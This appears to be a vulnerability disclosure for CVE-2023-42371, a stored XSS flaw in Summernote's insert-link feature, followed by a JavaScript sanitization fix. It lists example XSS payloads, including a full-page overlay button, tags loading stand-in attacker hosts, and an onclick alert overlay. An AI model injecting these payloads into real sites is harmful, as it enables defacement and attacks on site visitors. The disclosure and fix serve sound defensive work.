Descriptions (CVE-2023-42371)

A cross-site scripting (XSS) vulnerability was found in Summernote Rich Text Editor version 0.8.18 and earlier that allows an attacker to execute arbitrary code.
It has been classified as critical; the affected item is the insert link component.
It is possible to manipulate the preview text when inserting a link in the document, allowing the insertion of XSS payloads.
In a scenario where the content typed in the editor is stored in a table, a stored XSS attack vector opens.
NOTE: The vendor was contacted early about this disclosure.


Examples of Payloads

<button style="width:100vw; height:100vh; background: white; top:0 !important; left:0 !important; z-index:999 !important; border:none; background-image:url(https://porn-content.com/image.jpg) !important; background-repeat:no-repeat !important; background-position:center center !important;">Click Here $$</button>
<img src='malicious-site.com'>
<svg src='malicious-site.com'>
<input type=image src='malicious-site.com'>
<frame src='https://hacker.soarescorp.com/tools/pages/hacked.html'>
<object></object>
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)" ></div>

References

Vulnerability found by: LUCAS 5O4R3S

REF: Target
OWASP TOP10: https://owasp.org/Top10/
Summernote Vendor: https://summernote.org/
HackTricks XSS: https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting
OWASP Injection: https://owasp.org/Top10/A03_2021-Injection/

Mitre

You can view this CVE on the official MITRE website at the following link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42371

How to fix?

To avoid being exposed to this vulnerability, you can make the following adjustment:
- Use JavaScript code to remove any HTML tags or XSS payloads that exist within the <a> tags.
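
One way to apply this adjustment, as an added example that is not Summernote's own code: build the anchor from the dialog's two fields, strip anything tag-shaped from the display text, and escape what remains. It goes beyond the fix above by also restricting the URL scheme; the function names, the scheme allowlist and the example.com URL are assumptions made for this sketch.

```javascript
// Added example (not Summernote code): build the anchor for an "insert link"
// dialog so the display text can never carry markup into the stored document.
const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]); // assumption: tune per app

const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Remove everything shaped like a tag. The pattern matches at every "<"
// (closed or not), so no "<" survives the pass; the remaining characters are
// then escaped so that stray ">", "&" or quotes stay inert text.
function sanitizeLinkText(text) {
  const stripped = String(text).replace(/<[^>]*>?/g, "");
  return escapeHtml(stripped.trim());
}

// Accept only absolute URLs whose scheme is on the allowlist.
function safeHref(url) {
  try {
    const parsed = new URL(String(url).trim());
    return ALLOWED_SCHEMES.has(parsed.protocol) ? parsed.href : null;
  } catch {
    return null; // relative or unparsable input is rejected in this sketch
  }
}

// Returns the HTML to insert: a plain anchor, or inert text if the URL is refused.
function buildLink(text, url) {
  const href = safeHref(url);
  const label = sanitizeLinkText(text);
  if (href === null) return label;
  // If stripping left nothing to show, display the URL itself.
  return `<a href="${escapeHtml(href)}">${label || escapeHtml(href)}</a>`;
}

// Constructed demo input: markup in the "text to display" field, as in the payload list.
const demoText = '<div style="position:fixed" onclick="alert(1)"></div>Docs';
console.log(buildLink(demoText, "https://example.com/docs"));
```

Run the same sanitization on the server before the editor content is stored, since client-side JavaScript can be bypassed by posting directly to the backend.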